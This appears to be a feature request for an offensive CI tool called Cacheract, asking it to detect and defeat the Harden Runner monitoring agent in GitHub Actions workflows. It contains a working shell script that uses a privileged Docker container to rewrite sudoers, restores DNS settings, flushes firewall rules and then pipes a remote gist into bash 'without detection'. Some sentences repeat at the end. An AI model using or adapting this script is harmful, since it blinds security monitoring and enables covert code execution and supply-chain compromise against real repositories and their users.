Some repositories use Step Security's Harden Runner to monitor their workflows. It's possible to bypass and blind it using Docker. It would be good if Cacheract could:
- Detect if it detonates in a workflow where Harden Runner is in use.
- Use Docker along with an embedded light weight container image (is there something smaller than alpine - we just need to run a few commands) to first disable then blind the harden runner agent.
Example soften runner script:
# Get the alpine x64 docker image and include it with your payload
docker image load -i alpine.tar.gz
# Run a privileged docker container that mounts the sudoers file
docker run --privileged --mount type=bind,source=/etc/sudoers.d/,target=/etc/sudoers_host --mount type=bind,source=/tmp/,target=/host_tmp alpine:latest /bin/sh -c "cp /host_tmp/runner /etc/sudoers_host/"
sudo systemctl stop systemd-resolved
# Restore the old resolved.conf
sudo cp /tmp/resolved.conf /etc/systemd/resolved.conf
sudo systemctl restart systemd-resolved
# Remove harden runner iptables rules
sudo iptables -t filter -F OUTPUT
sudo iptables -t filter -F DOCKER-USER
# Run anything you want without detection.
curl -sSfL <GIST_URL> | bash
Would need to re-implement this in Typescript. Can use Docker rest API directly for better compatibility as well.
Some repositories use Step Security's Harden Runner to monitor their workflows. It's possible to bypass and blind it using Docker. It would be good if Cacheract could:
Example soften runner script:
Would need to re-implement this in Typescript. Can use Docker rest API directly for better compatibility as well.